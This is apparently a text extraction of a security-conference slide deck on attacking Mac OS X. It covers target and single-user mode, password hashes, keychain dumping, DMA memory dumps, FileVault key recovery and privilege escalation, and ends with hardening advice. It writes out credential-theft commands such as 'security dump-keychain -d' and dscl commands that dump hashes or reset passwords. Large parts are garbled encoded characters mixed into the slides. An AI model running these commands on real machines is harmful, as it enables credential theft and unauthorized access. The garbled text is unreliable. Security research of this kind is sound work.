Hck Mac OS X Tips and tricks for Mac OS X hack Summary

Introduction

Exploitation of target mode

Exploitation of physical memory

Exploitation of user privileges

Conclusion Introduction Introduction

Exploitation of target mode

Exploitation of physical memory Market Share Exploitation of user privileges Conclusion Mac vs Windows Introduction

Exploitation of target mode

Exploitation of physical memory Market Share Exploitation of user privileges Conclusion by continent Introduction

Exploitation of target mode

Exploitation of physical memory Mac OS X history Exploitation of user privileges Conclusion 1996 : Purchase of NeXT and NeXTSTEP OS by Apple 1996 : Come back of Steve Jobs within Apple (left in 1985) 1999 : First version of Mac OS X server (1.0) 2001 : First version of Mac OS X Workstation (10.0 Cheetah) 2006 : First Mac(Book) without PowerPC processor and with Intel processor Introduction

Exploitation of target mode

Exploitation of physical memory Mac OS X architecture Exploitation of user privileges Conclusion

UNIX system Based on Darwin OS (hybrid kernel XNU) Kernel XNU is based on micro-kernel of NeXTSTEP (Mach) and kernel of BSD (FreeBSD) But Darwin doesn’t contain graphical motor “Quartz” Introduction

Exploitation of target mode

Exploitation of physical memory Mac OS X architecture Exploitation of user privileges Conclusion

Mach Applications services

Mac interfaces IO Toolkit Login Windows

EFI BSD Quartz/Aqua

Platform Expert Launchd Finder/Dock

Core services Applications

Hardware Darwin (Mach) OS X

Kernel space

User space Exploitation of target mode Introduction

Exploitation of target mode

Exploitation of physical memory About target mode Exploitation of user privileges Conclusion

During the starting > press “T” Access not protected by default I@@
5779GG
HC
H<9
R@9G
GMGH9A
8=G?
H

Exploitation of target mode

Exploitation of physical memory Alternatives Exploitation of user privileges Conclusion

Single mode (press “Apple + S”)

From live OS in USB/CD device > Press “Alt” From Mac OS X installation DVD > Press “C” and select Reset Password from installer Introduction

Exploitation of target mode

Exploitation of physical memory Identify system users Exploitation of user privileges Conclusion

User UID in /private/var/db/dslocal/indices/Default/index

User privileges in /var/db/dslocal/nodes/Default/groupe/admin.plist Introduction

Exploitation of target mode

Exploitation of physical memory Identify system passwords Exploitation of user privileges Conclusion

Hashes passwords in /var/db/shadow/hash

Find clear password with brute force attack (JTR)

Introduction

Exploitation of target mode

Exploitation of physical memory 6CIH
$9M7<5=B
R@9 Exploitation of user privileges Conclusion

$9M7<5=B
R@9
GHCF9G
G97F9HG
85H5
@=?9

Safari passwords, WIFI keys, Skype username/password, Google username/password (contact, Picasa), Exchange username/password, ... Introduction

Exploitation of target mode

Exploitation of physical memory (D9B
$9M7<5=B
R@9G Exploitation of user privileges Conclusion

For each user, Keychain is stored in /Users//Library/ Keychains/login.keychain $9M7<5=B
R@9G
5F9
DFCH97H98
6M
?9M7<5=B
D5GGKCF8

"HQG
DCGG=6@9
HC
=ADCFH
5BM
$9M7<5=B
R@9G
K=H

Exploitation of target mode

Exploitation of physical memory (D9B
$9M7<5=B
R@9G Exploitation of user privileges Conclusion

But, you have to know “keychain” password to exploit it :(

By default, “keychain” password is equal to user system password :-) Introduction

Exploitation of target mode

Exploitation of physical memory (D9B
$9M7<5=B
R@9G Exploitation of user privileges Conclusion

You can identity password in volatility data You can attempt identify password by brute force attack

Introduction

Exploitation of target mode

Exploitation of physical memory About Filevault encryption Exploitation of user privileges Conclusion

B7FMDH=CB
C:
R@9
GMGH9A
,

@=?9
=H%C7?9F
CF
DM-Crypt

I@@
9B7FMDH=CB
:FCA
%=CB
J9FG=CB

Only Home directory encryption for previous versions Native function from Mac OS X 10.3

“.dmg” images can use Filevault encryption Introduction

Exploitation of target mode

Exploitation of physical memory About Filevault encryption Exploitation of user privileges Conclusion

Home directory without encryption

Home directory with Filevault encryption Introduction

Exploitation of target mode

Exploitation of physical memory (D9B
=@9J5I@H
R@9 Exploitation of user privileges Conclusion

=@9J5I@H
R@9
=G
GHCF98
=B
/Users//test.sparsebundle =@9J5I@H
R@9G
5F9
DFCH97H98
6M
D5GGKCF8

... and it’s the same as system password :-) ,C
:FCA
H5F;9H
AC89
=HQG
95GM
HC
897FMDH
H<=G
R@9 Introduction

Exploitation of target mode

Exploitation of physical memory (D9B
=@9J5I@H
R@9 Exploitation of user privileges Conclusion

You can identity AES key in volatility data ... Else, without access to hashes password, it is possible to

5HH9ADH
HC
RB8
D5GGKCF8
6M
6FIH9
:CF79
5HH57? Exploitation of physical memory Introduction

Exploitation of target mode

Exploitation of physical memory Physical memory dump Exploitation of user privileges Conclusion

From root access, MacMemoryReader can dump RAM

MMR create temporary kernel extension to read /dev/ mem devices Introduction

Exploitation of target mode

Exploitation of physical memory Physical memory dump Exploitation of user privileges Conclusion

4'!!+%(#!5
6'! contained physical memory dump for safe mode (hibernation mode)

FCA
:I@@
5779GG
8=G?
O,@99D=A5;9P
R@9
75B
69
J=9K98
FCA
F979BH
J9FG=CBG
R@9
=G
9B7FMDH98


Configuration of encryption of “sleepimpage” (root privileges to modification) Introduction

Exploitation of target mode

Exploitation of physical memory Physical memory dump Exploitation of user privileges Conclusion

Physical extraction ... +

Tools to extract RAM > http://www.mcgrewsecurity.com Introduction

Exploitation of target mode

Exploitation of physical memory Physical memory dump Exploitation of user privileges Conclusion

From DMA access, RAM dump is possible and EASY “pythonraw1394” libraries allow to dump RAM of

0=B8CKG
GMGH9A
:FCA
%=BIL
(2006 - Adam Boileau - Winlockpwn)

“libforensic1394” (Freddie Witherden) libraries allow to dump +&
C:
&
(,
1
:FCA
(,
1
CF
%=BIL Introduction

Exploitation of target mode

Exploitation of physical memory DMA access - PoC Exploitation of user privileges Conclusion

Using of “libforensic1394” libraries is very easy :-) and allow to write code to dump RAM ... Introduction

Exploitation of target mode

Exploitation of physical memory Exploit DMA access Exploitation of user privileges Conclusion

DEMO

$..+ -/ ()'*#-+*.",  0% !*!2+'*%.6,!1%,! !--#%)-.$.(' Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion

Identify current username for a locked session (open without auto logon)

Identify password for a locked session (open without auto logon) Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion

Identify current username for a locked session (open with auto logon)

Identify current password for a locked session (open with auto logon)

Identify just username for a locked session after startup Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion

A lot of others data secret are into physical memory like :

Email / Calendar data

(:R79
8C7IA9BHG
85H5

Web passwords

Software passwords

Keychain password

... Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion

AES 128 key used for Filevault encryption can be found into physical memory and allows to :

97FMDH
9B7FMDH98

Identify secret data in hard disk (like system passwords)

Unlock system ,$9MRB8
HCC@
75B
9LHF57H
,
?9MG Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion

Passware Kit 11.3 can extract and exploit the found keys Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion P0C to identify Web and software passwords Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion P0C to identify Web and software passwords Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion

P0C to identify Mac OSX passwords Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion

P0C to identify Mac OSX passwords Introduction

Exploitation of target mode

Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion

Is it possible to extract secret data when full encryption is 57H=J5H98
%=CB
J9FG=CB
6M
&
5779GG
 YES ! but NO if :

System is not started (pre-boot authentication screen)

System is hibernated in forcing to remove power from RAM (hibernatemode=25) '
H<9
D5F5A9H9F
HC
F9ACJ9
R@9J5I@H
?9MG
=B
+&
=G
57H=J5H98
(destroyfvkeyonstandby=1) Introduction

Exploitation of target mode

Exploitation of physical memory Writing physical memory Exploitation of user privileges Conclusion

... to bypass session password with “libforensic1394” libraries ! but ... it doesn’t work :-( Introduction

Exploitation of target mode

Exploitation of physical memory Writing physical memory Exploitation of user privileges Conclusion

Inception tool (breaknenter.org) will include options to bypass password screen but are not still implemented

Actually, I search the good signature for 10.6 and 10.7 Introduction

Exploitation of target mode

Exploitation of physical memory B8
-

@=?9
RF9K=F9
DCFH
K=H<
585DH9F and so can be exploited :-) Exploitation of user privileges Introduction

Exploitation of target mode

Exploitation of physical memory Obtain system user access Exploitation of user privileges Conclusion From physical access

Identify trivial password

Exploit DMA access, single mode, ...

LD@C=H
5IHC
@C;CB
G9GG=CB
:CF
H<9
RFGH
7CBR;IF98
IG9F
FCCH
DF=J=@9;9G
6M
89:5I@H From remote access

Identify services and usernames from mDNS service (UDP/5353) of Bonjour (or “Zeroconf”) service Introduction

Exploitation of target mode

Exploitation of physical memory Obtain system user access Exploitation of user privileges Conclusion From remote access

By common “server side” vulnerabilities like SMB, SSH, WEB, ...

By “client side” vulnerabilities of Safari, iTunes, iChat, Quicktime, Skype, ...

>$:1(&M$:N%)+&R& 01%234%5+&'(' *+,-%.&'/' 3H%):+&-& 9%:$M$:N%)+&A<& OD;%)D%;&P@H$")%)+&JQ& !""#$%&'()"*%+&,-&

B("0KL:F%& M$:N%)+&J5& !"#"$%&'()' BCD&E:F:& G%F%$"H*%D;&I/;+&J-& ./0)"1"2&340%+&5,& ."=/$$:&>/)%?"@+&5A&

67"8%&9%:7%)&%;& 60)"8:;+&5<&

Top 13 vulnerabilities in 2010 Introduction

Exploitation of target mode

Exploitation of physical memory Obtain system user access Exploitation of user privileges Conclusion From remote access

By common “server side” vulnerabilities like SMB, SSH, WEB, ...

By “client side” vulnerabilities of Safari, iTunes, iChat, Quicktime, Skype, ...

MS and Apple are affected

Just Apple is affected

Apple is not affected

Security updates for Apple products Introduction

Exploitation of target mode

Exploitation of physical memory Obtain system user access Exploitation of user privileges Conclusion

“exploit-db.com” stores a lot of remote exploits

Sample of remote exploits for Mac OS X “exploit-db.com” stores 15 remote exploits for Mac OS X platform from 2010 and 145 remote exploits for Windows platform from 2011 Most of vulnerabilities are due to a third party soft Introduction

Exploitation of target mode

Exploitation of physical memory Obtain system user access Exploitation of user privileges Conclusion %=?9
CH<9FG
(,
O&9H5GD@C=HP
5@@CKG
HC
95GM
9L97IH9
code under the context of the user

Safari exploit > cve-2011-3230 Introduction

Exploitation of target mode

Exploitation of physical memory User privileges escalation Exploitation of user privileges Conclusion

Previously, if you obtain root privileges

You can execute a lot of operation (Cf. Exploitation of target mode)

but password can be useful ... Previously, if you obtain user privileges

2CI
75B
5HH9ADH
HC
9LHF57H
G97F9H
85H5
=BHC
85H5
CF
GMGH9A
R@9
D9FGCB5@
85H5
GHCF98
D5GGKCF8
=BHC
HLH
R@9
9A5=@G


You can attempt to
% !).%"3
0/')!,%'%.%!-
*"
*)6#/,.%*)
*,
-*".1,!

You can attempt to exploit native Mac OS X functions

... Introduction

Exploitation of target mode

Exploitation of physical memory Exploit Mac OS X vulnerabilities Exploitation of user privileges Conclusion

/I@B9F56=@=H=9G
9LD@C=H5H=CB
=G
ACF9
8=:R7I@H
K=H<
,%+
:FCA
%9CD5F8

J9FG=CB
:I@@
,%+
:FCA
%=CB
 “exploit-db.com” stores a lot of local root exploits

Sample of local root exploit updates for Max OS X 44 local exploits for Mac OS X from 2003 and 220 for Windows from 2011 Most of vulnerabilities are due to a third party soft Introduction

Exploitation of target mode

Exploitation of physical memory Exploit native functions Exploitation of user privileges Conclusion

Using and copy stored passwords into Keychain requires user password Introduction

Exploitation of target mode

Exploitation of physical memory Exploit Keychain access Exploitation of user privileges Conclusion

But with “security” command, allows to bypass password prompt ... :-)

It’s my Evernote password

Sample of “security dump-keychain -d” command Others extracted passwords : Safari passwords, WIFI keys, Skype username/password, Google username/password (contact, Picasa), Exchange username/password, ... One of these passwords is maybe root password ... Introduction

Exploitation of target mode

Exploitation of physical memory Exploit Keychain Exploitation of user privileges Conclusion

Exploitation is possible just with “login.keychain”

Exploitation is possible because “login.keychain” is automatically open during the session ... if only keychain password is identical to user system password Opening of “system.keychain” requires login and password Introduction

Exploitation of target mode

Exploitation of physical memory Recents tips to escalate priv. Exploitation of user privileges Conclusion

CVE-2011-3435/36 : Exploit of dscl command to dump hashes password or to reset password without be root :

$dscl localhost -read /Search/Users/

$dscl localhost -passwd /Search/Users/ LD@C=H
OA57
DCFHP
7CBR;IF5H=CB
HC
<5J9
5
F9ACH9
FCCH

http://blog.infobytesec.com/2011/07/pwning-mac-os-x-with- evilgrade-macports.html?m=1 Exploit application outside of sandbox to by pass restriction on application within sandbox

http://www.generation-nt.com/mac-lion-faille-sandbox-corelabs- actualite-1501811.html Conlusion Introduction

Exploitation of target mode

Exploitation of physical memory &57
(,
1
G97IF98
CF
BCH
 Exploitation of user privileges Conclusion Secured Mac OS X is as secured as Windows

http://www.securityvibes.fr/produits-technologies/osx-lion-securite/ More exploits for Windows than Mac OS X because of

market share (more users so more researches ...) Introduction

Exploitation of target mode

Exploitation of physical memory Physical access is not secured Exploitation of user privileges Conclusion

By default, my son could own my Mac Book

by Single mode, by Target mode, by access DMA, ... as opposed to Windows PC (using DMA) -C
@=A=H
H<5H
=H
=G
B979GG5FM
HC
=BGH5@@
GC:HK5F9
HC
7CBR;IF9
EFI password and it not easy like under BIOS !

Password Prompt during startup 6IH
AC8=R75H=CB
C:
A5H9F=5@
7CBR;IF5H=CB
5@@CKG
HC
F9G9H
password ... Introduction

Exploitation of target mode

Exploitation of physical memory Optimum protection Exploitation of user privileges Conclusion

Use full disk encryption (Filevault, Truecrypt, ...)

B7FMDH
OG@99D=A5;9P
R@9
:CF79
HC
F9ACJ9
DCK9F
:FCA
+& Use a different password for system access and Keychain or use

5IH<9BH=75H=CB
6M
79FH=R75H9
http://www.opensc-project.org/sca/wiki/LogonAuthenticate) Use strong passwords and change regularly yours passwords

CBR;IF9
GMGH9A
HC
=BGH5@@
5IHCA5H=75@@M
G97IF=HM
D5H7

CBR;IF9
@C75@
RF9K5@@
HC
6@C7?
=BDIH
7CBB97H=CBG Install antivirus system (ClamXav, Avast, Intego, BitDefender, F- Secure, Panda Antivirus,...) Disable remote services (mDNS, SMB, Web, HTTP, ...) Introduction

Exploitation of target mode

Exploitation of physical memory Optimum protection Exploitation of user privileges Conclusion

Disable remote services (mDNS, SMB, Web, HTTP, ...)

)
0*%
.*
+/'%-$
3*/,
-3-.!(
 &/+
*,
&!3 $%)
6'!-
*)
Internet

no .... ???? Yes !!!

Google is your friend or not (for the victims) Introduction

Exploitation of target mode

Exploitation of physical memory $9M7<5=B
R@9G
5B8
! Exploitation of user privileges Conclusion 
!

Google Hacking DataBase























































=BIF@
=BH=H@9
R@9HMD9
Very easy to :

=89BH=:M
?9M7<5=B
R@9G
@=?9
 ?9M7<5=B Introduction

Exploitation of target mode

Exploitation of physical memory 5B8
)-
 Exploitation of user privileges Conclusion

iSEC Partners : http://www.isecpartners.com/storage/docs/ presentations/iSEC_BH2011_Mac_APT.pdf Introduction

Exploitation of target mode

Exploitation of physical memory

Exploitation of user privileges

Conclusion

Questions ?

Slides, paper and tools on :

http://sud0man.blogspot.com

sganama[at]gmail.com / @sud0man